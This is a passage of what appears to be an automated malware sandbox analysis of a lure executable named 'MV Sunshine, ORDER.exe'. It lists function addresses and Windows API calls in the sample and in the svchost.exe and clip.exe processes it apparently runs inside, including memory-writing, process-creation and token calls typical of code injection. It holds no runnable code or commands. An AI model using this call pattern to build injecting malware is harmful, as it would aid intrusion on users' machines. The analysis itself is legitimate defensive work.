            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04842BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842B60 NtClose,LdrInitializeThunk,3_2_04842B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048435C0 NtCreateMutant,LdrInitializeThunk,3_2_048435C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048439B0 NtGetContextThread,LdrInitializeThunk,3_2_048439B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842CC0 NtQueryVirtualMemory,3_2_04842CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842CF0 NtOpenProcess,3_2_04842CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842C00 NtQueryInformationProcess,3_2_04842C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842DB0 NtEnumerateKey,3_2_04842DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842D00 NtSetInformationFile,3_2_04842D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842EA0 NtAdjustPrivilegesToken,3_2_04842EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842E30 NtWriteVirtualMemory,3_2_04842E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842F90 NtProtectVirtualMemory,3_2_04842F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842FA0 NtQuerySection,3_2_04842FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842F60 NtCreateProcessEx,3_2_04842F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842AB0 NtWaitForSingleObject,3_2_04842AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842B80 NtQueryInformationFile,3_2_04842B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04843090 NtSetValueKey,3_2_04843090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04843010 NtOpenDirectoryObject,3_2_04843010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04843D10 NtOpenProcessToken,3_2_04843D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04843D70 NtOpenThread,3_2_04843D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028D7B40 NtCreateFile,3_2_028D7B40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028D7E30 NtClose,3_2_028D7E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028D7F90 NtAllocateVirtualMemory,3_2_028D7F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028D7CA0 NtReadFile,3_2_028D7CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028D7D90 NtDeleteFile,3_2_028D7D90
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_009E40B1
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009D8858
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009E545F
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_0098E8000_2_0098E800
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009ADBB50_2_009ADBB5
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00A0804A0_2_00A0804A
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_0098E0600_2_0098E060
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009941400_2_00994140
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A24050_2_009A2405
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B65220_2_009B6522
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00A006650_2_00A00665
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B267E0_2_009B267E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A283A0_2_009A283A
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009968430_2_00996843
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B89DF0_2_009B89DF
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B6A940_2_009B6A94
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00A00AE20_2_00A00AE2
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00998A0E0_2_00998A0E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E8B130_2_009E8B13
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009DEB070_2_009DEB07
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009ACD610_2_009ACD61
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B70060_2_009B7006
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009931900_2_00993190
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_0099710E0_2_0099710E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009812870_2_00981287
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A33C70_2_009A33C7
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009AF4190_2_009AF419
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009956800_2_00995680
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A16C40_2_009A16C4
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A78D30_2_009A78D3
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009958C00_2_009958C0
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A1BB80_2_009A1BB8
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B9D050_2_009B9D05
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_0098FE400_2_0098FE40
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A1FD00_2_009A1FD0
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009ABFE60_2_009ABFE6
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_022236300_2_02223630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011C01_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021A51_2_004021A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021B01_2_004021B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FACB1_2_0040FACB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FAD31_2_0040FAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023201_2_00402320
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023BC1_2_004023BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D4431_2_0042D443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164331_2_00416433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCF31_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DD731_2_0040DD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F501_2_00402F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A003E61_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F01_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA3521_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C02C01_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E02741_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A001AA1_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81CC1_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA1181_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039301001_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C81581_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C01_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039647501_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039407701_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C6E01_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A005911_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039405351_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE4F61_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F24461_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6BD71_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB401_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA801_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0A9A61_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A01_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039569621_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268B81_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8F01_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A8401_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428401_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEFA01_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC81_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960F301_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982F281_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F401_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952E901_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCE931_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEEDB1_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEE261_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940E591_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958DBF1_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393ADE01_2_0393ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AD001_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0CB51_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930CF21_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940C001_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398739A1_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F132D1_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D34C1_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039452A01_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B2C01_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D2F01_2_0395D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E12ED1_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B1B01_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0B16B1_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1721_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397516C1_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EF0CC1_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039470C01_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70E91_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF0E01_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF7B01_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F16CC1_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD5B01_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75711_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF43F1_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039314601_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FB801_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B5BF01_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DBF91_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB761_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DDAAC1_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03985AA01_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDAC61_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA491_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7A461_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B3A6C1_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039499501_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B9501_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438E01_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD8001_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941F921_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFFB11_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF091_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949EB01_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FDC01_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D5A1_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943D401_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D731_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFCF21_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B9C321_2_039B9C32
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D580502_2_02D58050
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D59FD02_2_02D59FD0
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D607102_2_02D60710
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D777202_2_02D77720
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D59DB02_2_02D59DB0
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D59DA82_2_02D59DA8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048BE4F63_2_048BE4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B44203_2_048B4420
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C24463_2_048C2446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D05913_2_048D0591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048105353_2_04810535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0482C6E03_2_0482C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0480C7C03_2_0480C7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048347503_2_04834750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048107703_2_04810770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048A20003_2_048A2000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D01AA3_2_048D01AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C41A23_2_048C41A2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C81CC3_2_048C81CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048001003_2_04800100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AA1183_2_048AA118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048981583_2_04898158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048902C03_2_048902C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B02743_2_048B0274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D03E63_2_048D03E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0481E3F03_2_0481E3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CA3523_2_048CA352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B0CB53_2_048B0CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04800CF23_2_04800CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04810C003_2_04810C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04828DBF3_2_04828DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0480ADE03_2_0480ADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0481AD003_2_0481AD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048ACD1F3_2_048ACD1F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04822E903_2_04822E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CCE933_2_048CCE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CEEDB3_2_048CEEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CEE263_2_048CEE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04810E593_2_04810E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0488EFA03_2_0488EFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04802FC83_2_04802FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04852F283_2_04852F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04830F303_2_04830F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B2F303_2_048B2F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04884F403_2_04884F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0483E8F03_2_0483E8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0481A8403_2_0481A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048128403_2_04812840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_047F68B83_2_047F68B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048129A03_2_048129A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048DA9A63_2_048DA9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048269623_2_04826962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0480EA803_2_0480EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C6BD73_2_048C6BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CAB403_2_048CAB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CF43F3_2_048CF43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048014603_2_04801460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AD5B03_2_048AD5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D95C33_2_048D95C3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C75713_2_048C7571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C16CC3_2_048C16CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048556303_2_04855630
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CF7B03_2_048CF7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048170C03_2_048170C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048BF0CC3_2_048BF0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C70E93_2_048C70E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CF0E03_2_048CF0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_047FF1723_2_047FF172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0481B1B03_2_0481B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048DB16B3_2_048DB16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0484516C3_2_0484516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048152A03_2_048152A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0482B2C03_2_0482B2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B12ED3_2_048B12ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0482D2F03_2_0482D2F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0485739A3_2_0485739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_047FD34C3_2_047FD34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C132D3_2_048C132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CFCF23_2_048CFCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04889C323_2_04889C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0482FDC03_2_0482FDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04813D403_2_04813D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C1D5A3_2_048C1D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C7D733_2_048C7D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04819EB03_2_04819EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04811F923_2_04811F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CFFB13_2_048CFFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CFF093_2_048CFF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_047D3FD53_2_047D3FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_047D3FD23_2_047D3FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048138E03_2_048138E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0487D8003_2_0487D800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048A59103_2_048A5910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048199503_2_04819950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0482B9503_2_0482B950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04855AA03_2_04855AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048ADAAC3_2_048ADAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B1AA33_2_048B1AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048BDAC63_2_048BDAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CFA493_2_048CFA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C7A463_2_048C7A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04883A6C3_2_04883A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0482FB803_2_0482FB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04885BF03_2_04885BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0484DBF93_2_0484DBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CFB763_2_048CFB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028C17203_2_028C1720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028DA2803_2_028DA280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028BABB03_2_028BABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028BCB303_2_028BCB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028BC9083_2_028BC908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028BC9103_2_028BC910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028C32703_2_028C3270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0464A43A3_2_0464A43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0464C0FC3_2_0464C0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0464B1683_2_0464B168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0464BC443_2_0464BC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0464BD643_2_0464BD64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 254 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 37 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 96 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0488F290 appears 103 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 047FB970 appears 262 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04857E54 appears 107 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04845130 appears 58 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0487EA12 appears 86 times
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: String function: 009A8B40 appears 42 times
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: String function: 00987F41 appears 35 times
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: String function: 009A0D27 appears 70 times
